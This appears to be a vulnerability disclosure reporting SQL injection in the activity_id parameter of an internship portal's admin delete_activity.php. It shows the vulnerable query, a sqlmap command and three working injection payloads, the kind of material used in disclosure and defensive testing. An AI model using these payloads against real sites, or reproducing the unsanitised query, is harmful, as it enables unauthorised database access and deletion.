/
Internship-Portal-Management-System-09
37 lines (26 loc) · 1.31 KB
/
Internship-Portal-Management-System-09
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Internship Portal Management System - SQL Injection on (admin/delete_activity.php?activity_id=XX)
Vendor Homepage:
https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
Version:V1.0
Tested on: PHP, Apache, MySQL
Affected Page:
delete_activity.php
On this page,activity_id parameter is vulnerable to SQL Injection Attack
Source Code(intern_sys/admin/delete_activity.php):
$conn->query("DELETE FROM `activity` WHERE `activity_id` = '$_REQUEST[activity_id]'") or die($conn->error);
Proof of vulnerability(Verify using the sqlmap tool after logining):
-> sqlmap -u
http://localhost/intern_sys/admin/delete_activity.php?activity_id=2 --batch
Output:
---
Parameter: activity_id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: activity_id=2' RLIKE (SELECT (CASE WHEN (8471=8471) THEN 2 ELSE 0x28 END))-- vJjA
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: activity_id=2' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(2529=2529,1))),0x7171786b71),2529)-- pxQk
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: activity_id=2' AND 5045=BENCHMARK(5000000,MD5(0x466f4f5a))-- dnxL
---